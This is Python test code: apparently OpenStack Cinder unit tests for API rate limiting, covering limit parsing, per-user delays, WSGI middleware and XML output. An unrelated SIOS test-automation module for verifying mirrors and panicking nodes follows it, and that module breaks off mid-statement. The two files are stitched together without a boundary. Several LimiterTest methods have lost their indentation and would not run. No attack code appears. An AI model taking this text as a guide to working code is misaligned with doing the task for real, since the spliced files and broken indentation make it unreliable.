    def _get_time(self):
        """Return the "time" according to this test suite."""
        return self.time
class LimitsControllerTest(BaseLimitTestSuite):
    """Tests for `limits.LimitsController` class."""
    def setUp(self):
        """Run before each test."""
        super(LimitsControllerTest, self).setUp()
        self.controller = limits.create_resource()
    def _get_index_request(self, accept_header="application/json"):
        """Helper to set routing arguments."""
        request = webob.Request.blank("/")
        request.accept = accept_header
        # Simulate the routing middleware: point the request at the
        # controller's 'index' action.
        request.environ["wsgiorg.routing_args"] = (None, {
            "action": "index",
            "controller": "",
        })
        context = cinder.context.RequestContext('testuser', 'testproject')
        request.environ["cinder.context"] = context
        return request
    def _populate_limits(self, request):
        """Put limit info into a request."""
        _limits = [
            limits.Limit("GET", "*", ".*", 10, 60).display(),
            limits.Limit("POST", "*", ".*", 5, 60 * 60).display(),
            limits.Limit("GET", "changes-since*", "changes-since",
                         5, 60).display(),
        ]
        request.environ["cinder.limits"] = _limits
        return request
    def test_empty_index_json(self):
        """Test getting empty limit details in JSON."""
        request = self._get_index_request()
        response = request.get_response(self.controller)
        expected = {
            "limits": {
                "rate": [],
                "absolute": {},
            },
        }
        body = jsonutils.loads(response.body)
        self.assertEqual(expected, body)
    def test_index_json(self):
        """Test getting limit details in JSON."""
        request = self._get_index_request()
        request = self._populate_limits(request)
        self.absolute_limits = {
            'gigabytes': 512,
            'volumes': 5,
        }
        response = request.get_response(self.controller)
        # Limits sharing the same regex/uri are grouped into one entry.
        expected = {
            "limits": {
                "rate": [
                    {
                        "regex": ".*",
                        "uri": "*",
                        "limit": [
                            {
                                "verb": "GET",
                                "next-available": "1970-01-01T00:00:00Z",
                                "unit": "MINUTE",
                                "value": 10,
                                "remaining": 10,
                            },
                            {
                                "verb": "POST",
                                "next-available": "1970-01-01T00:00:00Z",
                                "unit": "HOUR",
                                "value": 5,
                                "remaining": 5,
                            },
                        ],
                    },
                    {
                        "regex": "changes-since",
                        "uri": "changes-since*",
                        "limit": [
                            {
                                "verb": "GET",
                                "next-available": "1970-01-01T00:00:00Z",
                                "unit": "MINUTE",
                                "value": 5,
                                "remaining": 5,
                            },
                        ],
                    },
                ],
                "absolute": {"maxTotalVolumeGigabytes": 512,
                             "maxTotalVolumes": 5, },
            },
        }
        body = jsonutils.loads(response.body)
        self.assertEqual(expected, body)
    def _populate_limits_diff_regex(self, request):
        """Put limit info into a request."""
        _limits = [
            limits.Limit("GET", "*", ".*", 10, 60).display(),
            limits.Limit("GET", "*", "*.*", 10, 60).display(),
        ]
        request.environ["cinder.limits"] = _limits
        return request
    def test_index_diff_regex(self):
        """Test getting limit details in JSON."""
        request = self._get_index_request()
        request = self._populate_limits_diff_regex(request)
        response = request.get_response(self.controller)
        # Same uri but different regexes must yield two separate entries.
        expected = {
            "limits": {
                "rate": [
                    {
                        "regex": ".*",
                        "uri": "*",
                        "limit": [
                            {
                                "verb": "GET",
                                "next-available": "1970-01-01T00:00:00Z",
                                "unit": "MINUTE",
                                "value": 10,
                                "remaining": 10,
                            },
                        ],
                    },
                    {
                        "regex": "*.*",
                        "uri": "*",
                        "limit": [
                            {
                                "verb": "GET",
                                "next-available": "1970-01-01T00:00:00Z",
                                "unit": "MINUTE",
                                "value": 10,
                                "remaining": 10,
                            },
                        ],
                    },
                ],
                "absolute": {},
            },
        }
        body = jsonutils.loads(response.body)
        self.assertEqual(expected, body)
    def _test_index_absolute_limits_json(self, expected):
        """Assert the absolute-limits section of an index response."""
        request = self._get_index_request()
        response = request.get_response(self.controller)
        body = jsonutils.loads(response.body)
        self.assertEqual(expected, body['limits']['absolute'])
    def test_index_ignores_extra_absolute_limits_json(self):
        """Quota keys the view does not know about must be dropped."""
        self.absolute_limits = {'unknown_limit': 9001}
        self._test_index_absolute_limits_json({})
class TestLimiter(limits.Limiter):
    # Trivial subclass used by LimitMiddlewareTest to verify the middleware
    # instantiates the limiter class named in its configuration string.
    pass
class LimitMiddlewareTest(BaseLimitTestSuite):
    """Tests for the `limits.RateLimitingMiddleware` class."""
    @webob.dec.wsgify
    def _empty_app(self, request):
        """Do-nothing WSGI app."""
        pass
    def setUp(self):
        """Prepare middleware for use through fake WSGI app."""
        super(LimitMiddlewareTest, self).setUp()
        # One GET per minute overall, dispatched to the custom TestLimiter.
        _limits = '(GET, *, .*, 1, MINUTE)'
        self.app = limits.RateLimitingMiddleware(self._empty_app, _limits,
                                                 "%s.TestLimiter" %
                                                 self.__class__.__module__)
    def test_limit_class(self):
        """Test that middleware selected correct limiter class."""
        assert isinstance(self.app._limiter, TestLimiter)
    def test_good_request(self):
        """Test successful GET request through middleware."""
        request = webob.Request.blank("/")
        response = request.get_response(self.app)
        self.assertEqual(200, response.status_int)
    def test_limited_request_json(self):
        """Test a rate-limited (413) GET request through middleware."""
        request = webob.Request.blank("/")
        response = request.get_response(self.app)
        self.assertEqual(200, response.status_int)
        # Second request within the same minute must be throttled.
        request = webob.Request.blank("/")
        response = request.get_response(self.app)
        self.assertEqual(response.status_int, 413)
        self.assertIn('Retry-After', response.headers)
        retry_after = int(response.headers['Retry-After'])
        self.assertAlmostEqual(retry_after, 60, 1)
        body = jsonutils.loads(response.body)
        expected = "Only 1 GET request(s) can be made to * every minute."
        value = body["overLimitFault"]["details"].strip()
        self.assertEqual(value, expected)
    def test_limited_request_xml(self):
        """Test a rate-limited (413) response as XML."""
        request = webob.Request.blank("/")
        response = request.get_response(self.app)
        self.assertEqual(200, response.status_int)
        # Same throttle, but the fault document is requested as XML.
        request = webob.Request.blank("/")
        request.accept = "application/xml"
        response = request.get_response(self.app)
        self.assertEqual(response.status_int, 413)
        root = minidom.parseString(response.body).childNodes[0]
        expected = "Only 1 GET request(s) can be made to * every minute."
        details = root.getElementsByTagName("details")
        self.assertEqual(details.length, 1)
        value = details.item(0).firstChild.data.strip()
        self.assertEqual(value, expected)
class LimitTest(BaseLimitTestSuite):
    """Tests for the `limits.Limit` class."""
    def test_GET_no_delay(self):
        """Test a limit handles 1 GET per second."""
        limit = limits.Limit("GET", "*", ".*", 1, 1)
        delay = limit("GET", "/anything")
        self.assertIsNone(delay)
        self.assertEqual(0, limit.next_request)
        self.assertEqual(0, limit.last_request)
    def test_GET_delay(self):
        """Test two calls to 1 GET per second limit."""
        limit = limits.Limit("GET", "*", ".*", 1, 1)
        delay = limit("GET", "/anything")
        self.assertIsNone(delay)
        # Second call inside the same one-second window is delayed.
        delay = limit("GET", "/anything")
        self.assertEqual(1, delay)
        self.assertEqual(1, limit.next_request)
        self.assertEqual(0, limit.last_request)
        # Advance the virtual clock past the window; the limit clears.
        self.time += 4
        delay = limit("GET", "/anything")
        self.assertIsNone(delay)
        self.assertEqual(4, limit.next_request)
        self.assertEqual(4, limit.last_request)
class ParseLimitsTest(BaseLimitTestSuite):
    """Tests for the default limits parser in the `limits.Limiter` class."""
    def test_invalid(self):
        """Test that parse_limits() handles invalid input correctly."""
        self.assertRaises(ValueError, limits.Limiter.parse_limits,
                          ';;;;;')
    def test_bad_rule(self):
        """Test that parse_limits() handles bad rules correctly."""
        # Missing the surrounding parentheses.
        self.assertRaises(ValueError, limits.Limiter.parse_limits,
                          'GET, *, .*, 20, minute')
    def test_missing_arg(self):
        """Test that parse_limits() handles missing args correctly."""
        self.assertRaises(ValueError, limits.Limiter.parse_limits,
                          '(GET, *, .*, 20)')
    def test_bad_value(self):
        """Test that parse_limits() handles bad values correctly."""
        self.assertRaises(ValueError, limits.Limiter.parse_limits,
                          '(GET, *, .*, foo, minute)')
    def test_bad_unit(self):
        """Test that parse_limits() handles bad units correctly."""
        self.assertRaises(ValueError, limits.Limiter.parse_limits,
                          '(GET, *, .*, 20, lightyears)')
    def test_multiple_rules(self):
        """Test that parse_limits() handles multiple rules correctly."""
        try:
            l = limits.Limiter.parse_limits('(get, *, .*, 20, minute);'
                                            '(PUT, /foo*, /foo.*, 10, hour);'
                                            '(POST, /bar*, /bar.*, 5, second);'
                                            '(Say, /derp*, /derp.*, 1, day)')
        except ValueError as e:
            assert False, str(e)
        # Make sure the number of returned limits are correct
        self.assertEqual(len(l), 4)
        # Check all the verbs...
        expected = ['GET', 'PUT', 'POST', 'SAY']
        self.assertEqual([t.verb for t in l], expected)
        # ...the URIs...
        expected = ['*', '/foo*', '/bar*', '/derp*']
        self.assertEqual([t.uri for t in l], expected)
        # ...the regexes...
        expected = ['.*', '/foo.*', '/bar.*', '/derp.*']
        self.assertEqual([t.regex for t in l], expected)
        # ...the values...
        expected = [20, 10, 5, 1]
        self.assertEqual([t.value for t in l], expected)
        # ...and the units...
        expected = [limits.PER_MINUTE, limits.PER_HOUR,
                    limits.PER_SECOND, limits.PER_DAY]
        self.assertEqual([t.unit for t in l], expected)
class LimiterTest(BaseLimitTestSuite):
    """Tests for the in-memory `limits.Limiter` class."""
    def setUp(self):
        """Run before each test."""
        super(LimiterTest, self).setUp()
        # Per-user overrides: user3 gets no limits, user0 gets custom ones.
        userlimits = {'limits.user3': '',
                      'limits.user0': '(get, *, .*, 4, minute);'
                                      '(put, *, .*, 2, minute)'}
        self.limiter = limits.Limiter(TEST_LIMITS, **userlimits)
    def _check(self, num, verb, url, username=None):
        """Check and yield results from checks."""
        # xrange: this module targets Python 2 (cf. the httplib import).
        for x in xrange(num):
            yield self.limiter.check_for_delay(verb, url, username)[0]
    def _check_sum(self, num, verb, url, username=None):
        """Check and sum results from checks."""
        results = self._check(num, verb, url, username)
        return sum(item for item in results if item)
    def test_no_delay_GET(self):
        """Ensure no delay on a single call for a limit verb we didn't set."""
        delay = self.limiter.check_for_delay("GET", "/anything")
        self.assertEqual(delay, (None, None))
    def test_no_delay_PUT(self):
        """Ensure no delay on a single call for a known limit."""
        delay = self.limiter.check_for_delay("PUT", "/anything")
        self.assertEqual(delay, (None, None))
    def test_delay_PUT(self):
        """Test delay on 11th PUT request.
        Ensure the 11th PUT will result in a delay of 6.0 seconds until
        the next request will be granted.
        """
        expected = [None] * 10 + [6.0]
        results = list(self._check(11, "PUT", "/anything"))
        self.assertEqual(expected, results)
    def test_delay_POST(self):
        """Test delay on 8th POST request.
        Ensure the 8th POST will result in a delay of 6.0 seconds until
        the next request will be granted.
        """
        expected = [None] * 7
        results = list(self._check(7, "POST", "/anything"))
        self.assertEqual(expected, results)
        # The 8th request must wait 60/7 seconds for a slot to free up.
        expected = 60.0 / 7.0
        results = self._check_sum(1, "POST", "/anything")
        self.assertAlmostEqual(expected, results, 8)
    def test_delay_GET(self):
        """Ensure the 11th GET will result in NO delay."""
        expected = [None] * 11
        results = list(self._check(11, "GET", "/anything"))
        self.assertEqual(expected, results)
        # user0's custom 4-per-minute GET limit kicks in on the 5th request.
        expected = [None] * 4 + [15.0]
        results = list(self._check(5, "GET", "/foo", "user0"))
        self.assertEqual(expected, results)
def test_delay_PUT_volumes(self):
"""Test delay on /volumes.
Ensure PUT on /volumes limits at 5 requests, and PUT elsewhere
is still OK after 5 requests...but then after 11 total requests,
PUT limiting kicks in.
"""
# First 6 requests on PUT /volumes
expected = [None] * 5 + [12.0]
results = list(self._check(6, "PUT", "/volumes"))
self.assertEqual(expected, results)
# Next 5 request on PUT /anything
expected = [None] * 4 + [6.0]
results = list(self._check(5, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_delay_PUT_wait(self):
"""Test limit is lifted again.
Ensure after hitting the limit and then waiting for
the correct amount of time, the limit will be lifted.
"""
expected = [None] * 10 + [6.0]
results = list(self._check(11, "PUT", "/anything"))
self.assertEqual(expected, results)
# Advance time
self.time += 6.0
expected = [None, 6.0]
results = list(self._check(2, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_multiple_delays(self):
"""Ensure multiple requests still get a delay."""
expected = [None] * 10 + [6.0] * 10
results = list(self._check(20, "PUT", "/anything"))
self.assertEqual(expected, results)
self.time += 1.0
expected = [5.0] * 10
results = list(self._check(10, "PUT", "/anything"))
self.assertEqual(expected, results)
expected = [None] * 2 + [30.0] * 8
results = list(self._check(10, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
def test_user_limit(self):
"""Test user-specific limits."""
self.assertEqual(self.limiter.levels['user3'], [])
self.assertEqual(len(self.limiter.levels['user0']), 2)
def test_multiple_users(self):
"""Tests involving multiple users."""
# User0
expected = [None] * 2 + [30.0] * 8
results = list(self._check(10, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
# User1
expected = [None] * 10 + [6.0] * 10
results = list(self._check(20, "PUT", "/anything", "user1"))
self.assertEqual(expected, results)
# User2
expected = [None] * 10 + [6.0] * 5
results = list(self._check(15, "PUT", "/anything", "user2"))
self.assertEqual(expected, results)
# User3
expected = [None] * 20
results = list(self._check(20, "PUT", "/anything", "user3"))
self.assertEqual(expected, results)
self.time += 1.0
# User1 again
expected = [5.0] * 10
results = list(self._check(10, "PUT", "/anything", "user1"))
self.assertEqual(expected, results)
self.time += 1.0
# User1 again
expected = [4.0] * 5
results = list(self._check(5, "PUT", "/anything", "user2"))
self.assertEqual(expected, results)
# User0 again
expected = [28.0]
results = list(self._check(1, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
self.time += 28.0
expected = [None, 30.0]
results = list(self._check(2, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
class WsgiLimiterTest(BaseLimitTestSuite):
    """Tests for `limits.WsgiLimiter` class."""
    def setUp(self):
        """Run before each test."""
        super(WsgiLimiterTest, self).setUp()
        self.app = limits.WsgiLimiter(TEST_LIMITS)
    def _request_data(self, verb, path):
        """Get data describing a limit request verb/path.

        Returns a JSON body in the format the WsgiLimiter expects.
        """
        return jsonutils.dumps({"verb": verb, "path": path})
    def _request(self, verb, url, username=None):
        """Make sure that POSTing to the given url causes the given username
        to perform the given action. Make the internal rate limiter return
        delay and make sure that the WSGI app returns the correct response.

        Returns the X-Wait-Seconds header value when throttled (403),
        otherwise None (204 No Content).
        """
        # The limiter app keys the limit on the request path, so the
        # username (when given) becomes the path of the POST.
        if username:
            request = webob.Request.blank("/%s" % username)
        else:
            request = webob.Request.blank("/")
        request.method = "POST"
        request.body = self._request_data(verb, url)
        response = request.get_response(self.app)
        if "X-Wait-Seconds" in response.headers:
            self.assertEqual(response.status_int, 403)
            return response.headers["X-Wait-Seconds"]
        self.assertEqual(response.status_int, 204)
    def test_invalid_methods(self):
        """Only POSTs should work."""
        for method in ["GET", "PUT", "DELETE", "HEAD", "OPTIONS"]:
            request = webob.Request.blank("/", method=method)
            response = request.get_response(self.app)
            self.assertEqual(response.status_int, 405)
    def test_good_url(self):
        """An unthrottled path should incur no delay."""
        delay = self._request("GET", "/something")
        self.assertIsNone(delay)
    def test_escaping(self):
        """URL-escaped paths are handled like any other path."""
        delay = self._request("GET", "/something/jump%20up")
        self.assertIsNone(delay)
    def test_response_to_delays(self):
        """The second request to a 1/minute path must be delayed."""
        delay = self._request("GET", "/delayed")
        self.assertIsNone(delay)
        delay = self._request("GET", "/delayed")
        self.assertEqual(delay, '60.00')
    def test_response_to_delays_usernames(self):
        """Delays are tracked per-username, independently."""
        delay = self._request("GET", "/delayed", "user1")
        self.assertIsNone(delay)
        delay = self._request("GET", "/delayed", "user2")
        self.assertIsNone(delay)
        delay = self._request("GET", "/delayed", "user1")
        self.assertEqual(delay, '60.00')
        delay = self._request("GET", "/delayed", "user2")
        self.assertEqual(delay, '60.00')
class FakeHttplibSocket(object):
    """Stand-in for the socket that `httplib.HTTPResponse` reads from.

    Holds a canned response string in an in-memory buffer so that
    `httplib` can parse it as though it arrived over the network.
    """
    def __init__(self, response_string):
        """Store `response_string` in a file-like in-memory buffer."""
        self._buffer = six.StringIO(response_string)
    def makefile(self, _mode, _other):
        """Mimic `socket.makefile()` by handing back the internal buffer."""
        return self._buffer
class FakeHttplibConnection(object):
    """Fake `httplib.HTTPConnection`.

    Routes requests directly into an in-process WSGI app instead of
    opening a real network connection.
    """
    def __init__(self, app, host):
        """Initialize `FakeHttplibConnection`.

        :param app: the WSGI application requests are routed to
        :param host: host name reported on outgoing fake requests
        """
        self.app = app
        self.host = host
    def request(self, method, path, body="", headers=None):
        """Fake request handler.
        Requests made via this connection actually get translated and
        routed into our WSGI app, we then wait for the response and turn
        it back into an `httplib.HTTPResponse`.
        """
        if not headers:
            headers = {}
        req = webob.Request.blank(path)
        req.method = method
        req.headers = headers
        req.host = self.host
        req.body = body
        # str(response) renders status line + headers + body; prefixing
        # the HTTP version yields a raw response httplib can re-parse.
        resp = str(req.get_response(self.app))
        resp = "HTTP/1.0 %s" % resp
        sock = FakeHttplibSocket(resp)
        self.http_response = httplib.HTTPResponse(sock)
        # begin() parses the status line and headers from the fake socket.
        self.http_response.begin()
    def getresponse(self):
        """Return our generated response from the request."""
        return self.http_response
def wire_HTTPConnection_to_WSGI(host, app):
    """Monkeypatches HTTPConnection so that if you try to connect to host, you
    are instead routed straight to the given WSGI app.
    After calling this method, when any code calls
    httplib.HTTPConnection(host)
    the connection object will be a fake. Its requests will be sent directly
    to the given WSGI app rather than through a socket.
    Code connecting to hosts other than host will not be affected.
    This method may be called multiple times to map different hosts to
    different apps.
    This method returns the original HTTPConnection object, so that the caller
    can restore the default HTTPConnection interface (for all hosts).
    """
    class HTTPConnectionDecorator(object):
        """Wraps the real HTTPConnection class so that when you instantiate
        the class you might instead get a fake instance.
        """
        def __init__(self, wrapped):
            self.wrapped = wrapped
        def __call__(self, connection_host, *args, **kwargs):
            # Only the matching host is faked; everything else falls
            # through to the real (or previously-wrapped) class.
            if connection_host == host:
                return FakeHttplibConnection(app, host)
            else:
                return self.wrapped(connection_host, *args, **kwargs)
    # Swap in the decorator globally; callers must restore the returned
    # original to undo the patch.
    oldHTTPConnection = httplib.HTTPConnection
    httplib.HTTPConnection = HTTPConnectionDecorator(httplib.HTTPConnection)
    return oldHTTPConnection
class WsgiLimiterProxyTest(BaseLimitTestSuite):
    """Tests for the `limits.WsgiLimiterProxy` class."""
    def setUp(self):
        """setUp() for WsgiLimiterProxyTest.
        Do some nifty HTTP/WSGI magic which allows for WSGI to be called
        directly by something like the `httplib` library.
        """
        super(WsgiLimiterProxyTest, self).setUp()
        self.app = limits.WsgiLimiter(TEST_LIMITS)
        # 169.254.0.1 is a link-local address, so no real host is hit even
        # if the monkeypatch were somehow bypassed.
        oldHTTPConnection = (
            wire_HTTPConnection_to_WSGI("169.254.0.1:80", self.app))
        self.proxy = limits.WsgiLimiterProxy("169.254.0.1:80")
        self.addCleanup(self._restore, oldHTTPConnection)
    def _restore(self, oldHTTPConnection):
        # restore original HTTPConnection object
        httplib.HTTPConnection = oldHTTPConnection
    def test_200(self):
        """Successful request test."""
        delay = self.proxy.check_for_delay("GET", "/anything")
        self.assertEqual(delay, (None, None))
    def test_403(self):
        """Forbidden request test.

        The second request to the 1/minute '/delayed' path must come
        back throttled with a delay and a 403 error body.
        """
        delay = self.proxy.check_for_delay("GET", "/delayed")
        self.assertEqual(delay, (None, None))
        delay, error = self.proxy.check_for_delay("GET", "/delayed")
        error = error.strip()
        expected = ("60.00", "403 Forbidden\n\nOnly 1 GET request(s) can be "
                    "made to /delayed every minute.")
        self.assertEqual((delay, error), expected)
class LimitsViewBuilderTest(test.TestCase):
    """Tests for the limits view builder (rate + absolute limit output)."""
    def setUp(self):
        super(LimitsViewBuilderTest, self).setUp()
        self.view_builder = views.limits.ViewBuilder()
        # Input fixtures in the internal (capitalized-key) format the
        # builder consumes; the expected output below uses lowercase keys.
        self.rate_limits = [{"URI": "*",
                             "regex": ".*",
                             "value": 10,
                             "verb": "POST",
                             "remaining": 2,
                             "unit": "MINUTE",
                             "resetTime": 1311272226},
                            {"URI": "*/volumes",
                             "regex": "^/volumes",
                             "value": 50,
                             "verb": "POST",
                             "remaining": 10,
                             "unit": "DAY",
                             "resetTime": 1311272226}]
        self.absolute_limits = {"metadata_items": 1,
                                "injected_files": 5,
                                "injected_file_content_bytes": 5}
    def test_build_limits(self):
        """The builder must rename keys and format the reset timestamp."""
        # 1311272226 epoch seconds == 2011-07-21T18:17:06Z.
        tdate = "2011-07-21T18:17:06Z"
        expected_limits = {
            "limits": {"rate": [{"uri": "*",
                                 "regex": ".*",
                                 "limit": [{"value": 10,
                                            "verb": "POST",
                                            "remaining": 2,
                                            "unit": "MINUTE",
                                            "next-available": tdate}]},
                                {"uri": "*/volumes",
                                 "regex": "^/volumes",
                                 "limit": [{"value": 50,
                                            "verb": "POST",
                                            "remaining": 10,
                                            "unit": "DAY",
                                            "next-available": tdate}]}],
                       "absolute": {"maxServerMeta": 1,
                                    "maxImageMeta": 1,
                                    "maxPersonality": 5,
                                    "maxPersonalitySize": 5}}}
        output = self.view_builder.build(self.rate_limits,
                                         self.absolute_limits)
        self.assertDictMatch(output, expected_limits)
    def test_build_limits_empty_limits(self):
        """Empty inputs must still yield the full (empty) structure."""
        expected_limits = {"limits": {"rate": [],
                                      "absolute": {}}}
        abs_limits = {}
        rate_limits = []
        output = self.view_builder.build(rate_limits, abs_limits)
        self.assertDictMatch(output, expected_limits)
class LimitsXMLSerializationTest(test.TestCase):
    """Tests for XML serialization of limits responses."""
    def test_xml_declaration(self):
        """Serialized output must start with an XML declaration."""
        serializer = limits.LimitsTemplate()
        fixture = {"limits": {
                   "rate": [],
                   "absolute": {}}}
        output = serializer.serialize(fixture)
        has_dec = output.startswith("<?xml version='1.0' encoding='UTF-8'?>")
        self.assertTrue(has_dec)
    def test_index(self):
        """Serialize a populated fixture and verify every element/attr."""
        tdate = "2011-12-15T22:42:45Z"
        serializer = limits.LimitsTemplate()
        fixture = {"limits": {"rate": [{"uri": "*",
                                        "regex": ".*",
                                        "limit": [{"value": 10,
                                                   "verb": "POST",
                                                   "remaining": 2,
                                                   "unit": "MINUTE",
                                                   "next-available": tdate}]},
                                       {"uri": "*/servers",
                                        "regex": "^/servers",
                                        "limit": [{"value": 50,
                                                   "verb": "POST",
                                                   "remaining": 10,
                                                   "unit": "DAY",
                                                   "next-available": tdate}]}],
                              "absolute": {"maxServerMeta": 1,
                                           "maxImageMeta": 1,
                                           "maxPersonality": 5,
                                           "maxPersonalitySize": 10240}}}
        output = serializer.serialize(fixture)
        root = etree.XML(output)
        # Validate against the registered 'limits' XML schema first.
        xmlutil.validate_schema(root, 'limits')
        #verify absolute limits
        absolutes = root.xpath('ns:absolute/ns:limit', namespaces=NS)
        self.assertEqual(len(absolutes), 4)
        for limit in absolutes:
            name = limit.get('name')
            value = limit.get('value')
            self.assertEqual(value, str(fixture['limits']['absolute'][name]))
        #verify rate limits
        rates = root.xpath('ns:rates/ns:rate', namespaces=NS)
        self.assertEqual(len(rates), 2)
        for i, rate in enumerate(rates):
            for key in ['uri', 'regex']:
                self.assertEqual(rate.get(key),
                                 str(fixture['limits']['rate'][i][key]))
            rate_limits = rate.xpath('ns:limit', namespaces=NS)
            self.assertEqual(len(rate_limits), 1)
            for j, limit in enumerate(rate_limits):
                for key in ['verb', 'value', 'remaining', 'unit',
                            'next-available']:
                    self.assertEqual(
                        limit.get(key),
                        str(fixture['limits']['rate'][i]['limit'][j][key]))
    def test_index_no_limits(self):
        """An empty fixture serializes to empty absolute/rate sections."""
        serializer = limits.LimitsTemplate()
        fixture = {"limits": {
                   "rate": [],
                   "absolute": {}}}
        output = serializer.serialize(fixture)
        root = etree.XML(output)
        xmlutil.validate_schema(root, 'limits')
        #verify absolute limits
        absolutes = root.xpath('ns:absolute/ns:limit', namespaces=NS)
        self.assertEqual(len(absolutes), 0)
        #verify rate limits
        rates = root.xpath('ns:rates/ns:rate', namespaces=NS)
        self.assertEqual(len(rates), 0)
|
|
#-------------------------------------------------------------------------------
# Name: verifyactions.py
#-------------------------------------------------------------------------------
from __future__ import with_statement
__author__ = "Travis Goldie"
__email__ = "test_automation@us.sios.com"
__date__ = "03/22/2013"
__copyright__ = "(c) SIOS Technology Corp 2013"
import os
import subprocess
from dkutils import cleanValue, cleanAsType, doOnNodes, normjoin, netHelp
from dkconfig import dkconfig
def with_verification(config, paramList, verifier):
    """
    Purpose:
        Runs the given verifier function but handles
        all the verification stuff.
    Args for verifier:
        Config, postrunClient, *paramList
    Returns:
        The verifier's result, or config.returncodes["false"] when
        argument validation or client lookup fails.
    """
    false = config.returncodes["false"]
    funcName = verifier.__name__
    #Requires 3 or 4 args (the checks below accept either length).
    if len(paramList) < 3:
        config.logger.error("Need at least 3 Args for {}. Command Failed".
                            format(funcName))
        return false
    elif len(paramList) > 4:
        config.logger.error("Too many Args for {}. Command Failed".
                            format(funcName))
        return false
    #NOTE(review): the target node is taken from index 1 here, while
    #writefile()/panic() below use index 0 — presumably because verify
    #commands carry (source, target, ...); confirm against scenario docs.
    target = paramList[1]
    #Get the remote client
    client = config.getPostrunClient(target)
    if client is None:
        config.logger.error("Failed to get a remote client {} for cmd {}".
                            format(target, funcName))
        return false
    return verifier(config, client, paramList)
def mirrorverifier(config, client, args):
    """
    Purpose:
        Delegate a verifymirror call to the remote client.
    Args:
        0 - source
        1 - target
        2 - sourceVol
        3 - targetVol
    """
    verify = client.verifymirror
    return verify(*args)
def checksumverifier(config, client, args):
    """
    Purpose:
        Delegate a verifychecksum call to the remote client.
    Args:
        0 - source
        1 - target
        2 - sourceVol
        3 - targetVol
    """
    verify = client.verifychecksum
    return verify(*args)
def deleteverifier(config, client, args):
    """
    Purpose:
        Delegate a verifydelete call to the remote client.
    Args:
        0 - source
        1 - target
        2 - sourceVol
        3 - targetVol
    """
    verify = client.verifydelete
    return verify(*args)
def lockverifier(config, client, args):
    """
    Purpose:
        Delegate a verifylock call to the remote client.
    Args:
        0 - target
        1 - targetVol
    """
    verify = client.verifylock
    return verify(*args)
def unlockverifier(config, client, args):
    """
    Purpose:
        Delegate a verifyunlock call to the remote client.
    Args:
        0 - target
        1 - targetVol
    """
    verify = client.verifyunlock
    return verify(*args)
# some handle-wrappers since the consumers of these
# already expect it this way
#-------------------------------------------------------------------------------
# Functions that will be called from scenarios.
#-------------------------------------------------------------------------------
def verifymirror(config, paramList):
    """
    Verify the results of mirror creation.
    """
    return with_verification(config, paramList, mirrorverifier)
def verifychecksum(config, paramList):
    """
    Verify the results of mirror replication.
    """
    return with_verification(config, paramList, checksumverifier)
def verifydelete(config, paramList):
    """
    Verify the results of mirror deletion.
    """
    return with_verification(config, paramList, deleteverifier)
def verifylock(config, paramList):
    """
    Verify the results of locking volume.
    """
    return with_verification(config, paramList, lockverifier)
def verifyunlock(config, paramList):
    """
    Verify the results of unlocking volume.
    """
    return with_verification(config, paramList, unlockverifier)
def writefile(config, paramList):
    """
    Purpose:
        Uses WriteFile.exe to write to volume.
    Args:
        0 - target
        1 - targetVol
        2 - filesize (Size of each file generated)
        3 - count (Optional; number of files to generate)
        4 - background (Optional)
            0 - Wait until process completes (default)
            1 - Start all processes and then return
    Returns:
        The remote client's writefile() result, or
        config.returncodes["false"] on validation/lookup failure.
    """
    #NOTE: Unlike verify* functions there is no need for a "filewriter" function
    #Nor does this function need to call with_verification. All that work
    #is done within this function
    false = config.returncodes["false"]
    #Fix: __name__ is the *module* name, so log messages never identified
    #which command failed. Use this function's own name instead.
    funcName = writefile.__name__
    #writefile requires at least 3 parameters. All others optional.
    if len(paramList) < 3:
        config.logger.error("Need at least 3 Args for {}. Command Failed".
                            format(funcName))
        return false
    elif len(paramList) > 5:
        config.logger.error("Too many Args for {}. Command Failed".
                            format(funcName))
        return false
    target = paramList[0]
    #Get the remote client
    client = config.getPostrunClient(target)
    if client is None:
        config.logger.error("Failed to get a remote client {} for cmd {}".
                            format(target, funcName))
        return false
    return client.writefile(*paramList)
def panic(config, paramList):
    """
    Purpose:
        Panics (crashes) the target node.
    Args:
        0 - target
        1 - delay (the delay in seconds to wait before panic)
    Returns:
        The remote client's panic() result, or
        config.returncodes["false"] on validation/lookup failure.
    """
    #NOTE: Unlike verify* functions there is no need for a "dopanic" function
    #Nor does this function need to call with_verification. All that work
    #is done within this function
    false = config.returncodes["false"]
    #Fix: __name__ is the *module* name, so log messages never identified
    #which command failed. Use this function's own name instead.
    funcName = panic.__name__
    #panic requires exactly 2 args: target and delay.
    if len(paramList) < 2:
        #Fix: message previously claimed 3 args were needed; panic takes 2.
        config.logger.error("Need at least 2 Args for {}. Command Failed".
                            format(funcName))
        return false
    elif len(paramList) > 2:
        config.logger.error("Too many Args for {}. Command Failed".
                            format(funcName))
        return false
    target = paramList[0]
    #Get the remote client
    client = config.getPostrunClient(target)
    if client is None:
        config.logger.error("Failed to get a remote client {} for cmd {}".
                            format(target, funcName))
        return false
    return client.panic(*paramList)
def verifyexternal(config, cmdName, expectedRetCode, expectedOutput, paramList):
    """
    Runs the external command (cmd and args described by 'args')
    and verifies it's output/exit code.

    Returns True when both the return code and output match the
    expectations (empty/zero expectations are skipped), False otherwise.
    """
    false = config.returncodes["false"]
    success = config.returncodes["success"]
    resultFlag = True
    netHelpMsg = ""
    #Cap how much command output is included in failure logs.
    maxLen = config.settings["maxoutputlen"]
    #config.logger.debug("Testname {}, Paramlist {}".format(testName, paramList))
    try:
        output = subprocess.check_output(paramList, stderr=subprocess.STDOUT)
        retCode = success
    except subprocess.CalledProcessError as err:
        #This is the error from subprocess. If any test has a non-zero
        #return code it will be caught here and then can be used in the
        #comparisions below.
        output = err.output
        retCode = err.returncode
        netHelpMsg = netHelp(retCode)
    #NOTE(review): WindowsError is Windows-only; on other platforms this
    #except clause would itself raise NameError. Presumably this module
    #only runs on Windows (WriteFile.exe, "net help") — confirm.
    except WindowsError as err:
        config.logger.exception("Failed to find file {}".format(paramList[0]))
        raise err
    #Need to decode output so it can be compared to expectedOutput
    if isinstance(output, bytes):
        output = output.decode("utf-8")
    #A falsy expectedRetCode/expectedOutput disables that comparison.
    if expectedRetCode and retCode != expectedRetCode:
        config.logger.error("FAILED cmd {} Got error code \"{}\", "
                            "expected \"{}\"".
                            format(cmdName,
